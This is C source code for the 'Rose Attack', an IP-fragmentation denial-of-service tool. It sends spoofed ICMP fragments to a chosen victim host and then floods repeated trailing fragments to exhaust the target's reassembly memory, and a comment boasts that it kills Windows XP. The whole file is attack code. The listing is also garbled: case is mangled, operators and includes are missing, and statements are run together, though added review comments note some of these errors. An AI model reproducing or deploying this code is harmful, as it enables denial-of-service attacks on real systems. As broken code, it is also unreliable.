/***
Rose Attack (Variation 2) (CHUCK (AT) Lemure.Net)
Discovered by:
Gandalf (at) DIGITAL.NET
Code Modified from larme igmp attack by:
Kox by Coolio (Coolio (AT) K-r4D.com)
Sends out small IP fragments totalling up to a large
ICMP packet. Then repeatedly sends the last IP fragment, forcing the
reassembly code to traverse to the last IP fragment in order to
do a free() followed by a malloc(). Or so it seems.
Reportedly works for TCP/UDP as well, since this is
an IP layer attack.
***/
/* Just a thousand kills Win XP */
#define num_packets 100
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
/* Print the command-line help and exit(1).
 * arg is presumably argv[0] for the "USAGE:" line (the caller passes
 * argv[0]); as transcribed that string literal is truncated (no closing
 * quote and no format arguments), so this listing does not compile as
 * shown. The "/ N" sequences look like garbled "\n" escapes. */
Void usage (char * arg)
{
Printf ("Rose Attack / N");
Printf ("USAGE:% s
Printf ("IF Source Not Specified, Will Send Out from Random IP's / N");
Exit (1);
}
/* Build a random dotted-quad string and return it as a network-order
 * address via inet_addr().
 *
 * Notes from review of the listing as shown:
 *  - `he` and `sin` are declared but never used.
 *  - `buf` is calloc'd (16 bytes) and never freed: inet_addr() returns a
 *    value computed from it, the pointer itself is dropped, so every call
 *    leaks 16 bytes.
 *  - The operator between each `(Random ()% N)` term and the following
 *    constant appears to have been lost in transcription (presumably `+`),
 *    and "% d" is a garbled "%d"; as printed this does not compile.
 *  - Uses random() without range validation beyond the modulus; the
 *    resulting first octet range depends on the lost operator — confirm. */
unsigned int randip ()
{
Struct hostent * he;
Struct SockAddr_in sin;
Char * buf = (char *) Calloc (1, sizeof (char) * 16);
Sprintf (buf, "% d.% d.% d.% d",
(Random ()% 191) 23,
(Random ()% 253) 1,
(Random ()% 253) 1,
(Random ()% 253) 1);
Return INET_ADDR (BUF);
}
/* One's-complement Internet checksum (the usual RFC 1071 shape) over LEN
 * bytes starting at buh, returned in host byte order of the summation.
 *
 * Structure as printed: sum 16-bit words while more than one byte remains,
 * fold a trailing odd byte into the low half of a zeroed 16-bit word, fold
 * the carries out of the upper 16 bits back in twice, then complement.
 *
 * Transcription caveats (the listing does not compile as shown):
 *  - Identifier case is inconsistent (`len`/`LEN`, `sum`/`SUM`,
 *    `oddbyte`/`ODDBYTE`), which C treats as distinct names.
 *  - The accumulation operators are missing: `SUM = * buh ;` is presumably
 *    `sum += *buh++`, `sum = oddbyte;` presumably `sum += oddbyte;`, and
 *    the first fold line has no operator between its two terms
 *    (presumably `+`).
 *  - `0xFFF` on the fold line looks like a truncated `0xFFFF`; with a
 *    12-bit mask the fold would be wrong — confirm against an original copy. */
Unsigned Short In_cksum (unsigned short * buh, int LEN)
{
Register long sum = 0;
UNSIGNED SHORT ODDBYTE;
Register unsigned short answer;
/* Main loop: consume 16-bit words. */
While (len> 1) {
SUM = * buh ;
LEN - = 2;
}
/* Odd trailing byte: place it in the low-order byte of a zeroed word. */
IF (len == 1) {
ODDBYTE = 0;
* ((unsigned char *) & oddbyte) = * (unsigned char *) buh; sum = oddbyte;
}
/* Fold the carry bits above bit 16 back into the low 16 bits (twice,
 * since the first fold can itself carry). */
SUM = (SUM >> 16) (SUM & 0xFFF);
SUM = (SUM >> 16);
/* One's complement of the folded sum is the checksum. */
Answer = ~ SUM;
Return Answer;
}
INT Fire_Away (Struct SockAddr_in * Victim, Unsigned Long SRC)
{
INT Smallicmp = 1;
UNSIGNED Char * Pkt;
Struct iphdr * ip;
Struct IGMPHDR * IGMP;
Struct ICMPHDR * ICMP_PKT;
Struct Utsname * UN;
Struct Passwd * P;
Int idlist [num_packets];
Unsigned long j;
INT I, S;
INT ID = (Random ()% 40000) 500;
For (i = 0; i IDLIST [I] = (random ()% 40000) 500; PKT = (unsigned char *) Calloc (1, Smallicmp) SIZEOF (STRUCT IPHDR) SizeOf (struct icmphdr); IP = (struct iphdr *) pkt; ICMP_PKT = (Struct ICMphDR *) (PKT SIZEOF (Struct iPhdr)); IP-> Version = 4; IP-> IHL = (SIZEOF * IP) / 4; IP-> TTL = 255; IP-> Tot_len = HTons (Smallicmp); IP-> protocol = 1; IP-> ID = HTONS (ID); IP-> FRAG_OFF = HTONS (IP_MF); IP-> Saddr = SRC; IP-> DADDR = VICTIM-> SIN_ADDR.S_ADDR; IP-> CHECK = IN_CKSUM ((unsigned short *) IP, sizeof (struct iPhdr)); ICMP_PKT-> TYPE = ICMP_ECHO; ICMP_PKT-> CODE = 0; ICMP_PKT-> CHECKSUM = 1000; ICMP_PKT-> un.echo.id = random ()% 255; ICMP_PKT-> un.echo.sequence = random ()% 255; For (i = sizeof (struct iPhdr) sizeof (struct ICMphdr) 1; I PKT [I] = random ()% 255; } IF ((S = Socket, Sock_RAW, IPPROTO_RAW) <0) { Perror ("Error: socket ()"); Return 1; } Printf ("Sending Out Series Of Fragments / R / N"); For (i = 0; i IP-> ID = HTONS (IDList [i]); For (j = 0; j <8170; j = smallicmp 1) { IP-> FRAG_OFF = HTONS (J | IP_MF); IF (SENDTO (S, PKT, Smallicmp SizeOf (Struct iPhdr), 0, (struct sockaddr *) Victim, SIZEOF (STRUCT SOCKADDR_IN) == -1) { Perror ("Error: Sendto ()"); Return 1; } } } Printf ("Sending Out Tailing Fragments / R / N"); / * BIG FRAG At end ... * / / * Sending a large amount of the end fragments over and OVER. this is definitely overkill, but see to work * / For (j = 0; j <9999 * num_packets; j ) { For (i = 0; i IP-> ID = HTONS (IDList [i]); IP-> FRAG_OFF = HTONS (8190 | IP_MF); // ip-> Frag_off = HTONS (8100 | IP_MF); Sendto (S, PKT, SIZEOF (STRUCT IPHDR) Smallicmp, 0, (struct sockaddr *) Victim, SizeOf (struct sockaddr_in); / * if you do sleep, cpu usage goes way down. 
But memory usage STILL CREEPS UPWARD * / // Usleep (100); // Sleep After Every Trailing Packet } Usleep (100); // Sleep After Every Series of Num_packets } Free (pkt); Close (s); Return 0; } Int main (int Argc, char * argv []) { Struct SockAddr_in Victim; Struct hostent * he; Unsigned long source; INT I; Srandom (Time (NULL)); IF (Argc <2) USAGE (Argv [0]); IF ((he = gethostByname) == null) { Herror (Argv [1]); Exit (1); } IF (argc> 2) { Source = INET_ADDR (Argv [2]); } Else { Source = randip (); } Memcpy (& Victim.sin_addr.s_addr, he-> h_addr, he-> h_length); Victim.sin_port = htons (0); Victim.sin_family = pf_inet; Printf ("Sending ICMP FRAGMENTS: / R / N"); Fflush (stdout); Fire_Away (& Victim, Source); IF (argc <3) { Source = randip (); } Fflush (stdout); Printf ("/ ndone / n"); fflush (stdout); }